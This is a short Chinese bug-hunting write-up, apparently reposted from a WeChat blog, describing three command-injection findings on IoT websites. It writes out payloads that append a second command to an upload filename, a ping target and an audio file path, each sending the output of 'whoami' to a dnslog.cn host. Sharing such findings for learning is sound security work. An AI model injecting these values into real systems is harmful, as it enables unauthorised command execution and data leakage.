那年那日那些洞
2022-9-17 20:34:8 Author: 黑战士(查看原文) 阅读量:12 收藏

前言此文库主要是记录一年来一些有趣的漏洞,拿出来给大家分享一下,仅供学习参考,禁止对任何未授权的网站进行实操。此系列会持续更新~~~也欢迎大家投稿!!1.命令执行不说废话直接上图,这是一个iot的站所以有些功能点就很奇怪的

修改filename里面的内容:111.wav|ping `whoami`.v5hy64.dnslog.cn

神奇吧,为什么我会想到在filename拼接语句呢

因为平时在上传点的filename也是有概率存在rce的,所以我就试了试

2.命令执行

还是iot的站

看到ping的字眼就要注意了,这个包很明显就是在ping 192.168.5.1

这个包,把192.168.5.1改成192.168.5.1|curl `whoami`.vi50t3.dnslog.cn 看看会怎么样

3.(惊掉你眼睛的)命令执行

同样还是iot的站,跟上面是同一个站点

这是试听的原始包。

但是他的返回包是这样的

于是在wav后缀后面加上|ping `whoami`.ykjxel.dnslog.cn

神奇吧!!!!!!!!!!

内容来源:https://www.yuque.com/docs/share/cf9baab8-22ed-4ebc-8ced-57845792a93c


文章来源: http://mp.weixin.qq.com/s?__biz=MzUxMzQ2NTM2Nw==&mid=2247488906&idx=1&sn=26cc3c7899a96226d17a3c298437a8b4&chksm=f95598f2ce2211e47452a19bd034f04796d1291febd7f3dc2f0cfc25b6069367a6353fcaf45d#rd
如有侵权请联系:admin#unsafe.sh